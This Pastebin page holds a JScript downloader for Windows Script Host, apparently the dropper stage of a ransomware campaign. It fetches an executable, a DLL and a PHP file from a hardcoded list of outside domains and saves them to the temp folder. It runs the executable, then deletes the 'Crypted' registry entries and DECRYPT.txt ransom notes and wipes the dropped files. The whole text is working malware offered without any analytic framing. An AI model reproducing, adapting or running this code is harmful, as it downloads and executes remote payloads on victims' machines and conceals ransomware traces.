Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var ad = "1GvBs6wNH6R9kmLDYJmMsQNryni4ZVzy3P";
- var ld = 0;
- var cq = String.fromCharCode(34);
- var cs = String.fromCharCode(92);
- var ll = "szallas-utazas-wellness.hu tsvetodom.ru zexum.com tbmcompany.com stroydek.ru".split(" ");
- var ws = WScript.CreateObject("WScript.Shell");
- var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
- var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll";
- var xo = WScript.CreateObject("MSXML2.XMLHTTP");
- var xa = WScript.CreateObject("ADODB.Stream");
- var fo = WScript.CreateObject("Scripting.FileSystemObject");
- for (var n = 3; n <= 5; n++) {
- for (var i = ld; i < ll.length; i++) {
- var dn = 0;
- try {
- xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&rnd=" + i + n, false);
- xo.send();
- if (xo.status == 200) {
- xa.open();
- xa.type = 1;
- xa.write(xo.responseBody);
- if (xa.size > 1000) {
- dn = 1;
- if (n == 3) {
- xa.saveToFile(fn + ".exe", 2);
- } else if (n == 4) {
- xa.saveToFile(pd, 2);
- } else if (n == 5) {
- xa.saveToFile(fn + ".php", 2);
- };
- };
- xa.close();
- };
- if (dn == 1) {
- ld = i;
- break;
- };
- } catch (er) {};
- };
- };
- if (fo.FileExists(fn + ".exe") && fo.FileExists(pd) && fo.FileExists(fn + ".php")) {
- ws.Run("%COMSPEC% /c " + fn + ".exe " + cq + fn + ".php" + cq, 1, 1);
- ws.Run("%COMSPEC% /c REG DELETE " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /F", 0, 0);
- ws.Run("%COMSPEC% /c REG DELETE " + cq + "HKCR" + cs + ".crypted" + cq + " /F", 0, 0);
- ws.Run("%COMSPEC% /c REG DELETE " + cq + "HKCR" + cs + "Crypted" + cq + " /F", 0, 0);
- ws.Run("%COMSPEC% /c del " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
- ws.Run("%COMSPEC% /c del " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
- var fp = fo.CreateTextFile(fn + ".php", true);
- for (var i = 0; i < 1000; i++) {
- fp.WriteLine(ad);
- };
- fp.Close();
- ws.Run("%COMSPEC% /c DEL " + cq + fn + ".php" + cq, 0, 0);
- ws.Run("%COMSPEC% /c DEL " + cq + fn + ".exe" + cq, 0, 0);
- ws.Run("%COMSPEC% /c DEL " + cq + pd + cq, 0, 0);
- };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement